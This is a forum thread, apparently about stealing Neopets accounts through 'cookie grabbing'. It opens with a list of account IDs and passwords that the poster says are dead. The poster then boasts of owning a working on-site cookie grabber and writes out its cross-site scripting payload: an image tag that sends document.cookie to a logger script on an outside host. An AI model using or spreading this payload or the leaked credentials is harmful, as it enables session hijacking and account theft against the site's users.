Code:
ID: Neo password: hiniom%2B7463b26930fe962fbbe3e1121b170a6755ba4d26
ID: Neo password: limp_101%2Bfcd146b65b18f0d9a5cea38af505f8742073e600
ID: Neo password: ace_team%2Bd38aecac3362a6b75cc0c6c76dae38e129ed90ff
ID: Neo password: phytotoxins%2B7500e811c959d4ad03a3c0952f378f84cdbf3fda
ID: Neo password: omgnowayrly%2B4dc666ac03e1253c8fb99eff0e6d30b868d1fb30
Yea, of course cgers dont exist. Lol. (None of those still work. Dont bother trying)
But for the record, he is mostly correct. CGers are almost impossible to get on the site at this point. Im pretty positive I have the only working onsite cger. Known of the exploit for years. Didnt try perfecting it until a few months ago.
Originally Posted by
learningtoneopet1
gaskin, CGing is when someone uses a script, which directs someone to a non-neo page and back again really fast. It records their cookies (which contains their account information) allowing the CGer to log into their account
. Not an expert though so don't quote me lol that's just my understanding of it.
Kinda.
CGing requires you to find a way to run javascript on the site. It never leaves neo and directs you to a non-neo page quickly. That would be too obvious.
My CGer just uses javascript to load an image at the end of the page. That image being
Code:
<img src="http://site.com/logger.php?c=" + document.cookie>
never actually leaves neo. document.cookie being the users cookie obviously.
Needed to correct that.